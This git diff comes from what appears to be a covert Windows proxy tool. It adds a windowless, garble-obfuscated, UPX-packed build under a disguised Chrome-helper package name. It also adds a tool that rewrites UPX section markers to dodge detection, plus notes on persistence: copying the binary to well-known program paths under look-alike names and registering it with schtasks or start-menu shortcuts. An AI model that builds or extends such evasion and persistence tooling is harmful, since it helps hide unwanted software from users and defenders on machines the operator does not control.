diff --git a/Makefile b/Makefile
index fb06f58..f30a6d9 100644
--- a/Makefile
+++ b/Makefile
@@ -21,6 +21,7 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
win: socks5-ssh-proxy.exe
socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
+ upx $@
goreleaser: resources $(GARBLE_BIN)
goreleaser build --clean --snapshot --id win-release
win-package: ChromeProxyHelperPlugin.zip
diff --git a/README.md b/README.md
index e3e3192..01a6d85 100644
--- a/README.md
+++ b/README.md
@@ -61,7 +61,7 @@ Following detections have been tested:
* go
* upx
* goreleaser
-* mingw-w64 (for building the windows dll)
+* mingw-w64 (for building the windows dll/exe)
## Related information
@@ -77,8 +77,4 @@ Following detections have been tested:
*
*
-*
* >
-*
-*
-*
diff --git a/cmd/upx-obfuscator/main.go b/cmd/upx-obfuscator/main.go
index ba6643c..fca8e21 100644
--- a/cmd/upx-obfuscator/main.go
+++ b/cmd/upx-obfuscator/main.go
@@ -6,8 +6,18 @@ import (
"log"
)
-var originalIdentifier = []byte("UPX0")
-var obfuscatedIdentifier = []byte("GSP7")
+func bytesReplace(data, old, new []byte) []byte {
+ foundIndex := bytes.Index(data, old)
+ if foundIndex > -1 {
+ // Found it!
+ log.Println("Found identifier at offset", foundIndex)
+ } else {
+ return data
+ log.Fatalln("Error file is not UPX packed")
+ }
+
+ return bytes.Replace(data, old, new, 1)
+}
func main() {
if len(os.Args) != 2 {
@@ -21,17 +31,11 @@ func main() {
data, _ := os.ReadFile(filename)
- foundIndex := bytes.Index(data, originalIdentifier)
- if foundIndex > -1 {
- // Found it!
- log.Println("Found UPX identifier at offset", foundIndex)
- } else {
- log.Fatalln("Error file is not UPX packed")
- }
+ data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
+ data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
+ data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
-
- obfuscatedData := bytes.Replace(data, originalIdentifier, obfuscatedIdentifier, 1)
- _ = os.WriteFile(filename, obfuscatedData, 0666)
+ _ = os.WriteFile(filename, data, 0666)
log.Println("done")
}
diff --git a/docs/NOTES.md b/docs/NOTES.md
new file mode 100644
index 0000000..84a7f6a
--- /dev/null
+++ b/docs/NOTES.md
@@ -0,0 +1,34 @@
+# Some notes to Escape from Babylon
+
+## Well known paths (Windows)
+
+* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
+* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
+* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
+* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
+* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
+* FireFox: `C:\Users\\AppData\Local\Mozilla Firefox\firefox.exe`
+* Chrome: `C:\Users\\AppData\Local\Google\Chrome\Application\chrome.exe`
+
+## Ultimate Packer for Executables (UPX)
+
+*
+*
+*
+*
+
+## Persistence and hiding
+
+* Search for existing well known binary paths
+* Copy argv[0] to well known binary path
+* Register startup by system
+ * schtasks (cmd) for system or local user
+ * go-autostart: shortcut in start-menu
+* Write state file of persistence to somewhere...
+
+## Windows
+
+* Copy to well known current user binary path to semi related filenames
+* Run via start menu item for current user, or via `schtasks`
+ *
+ *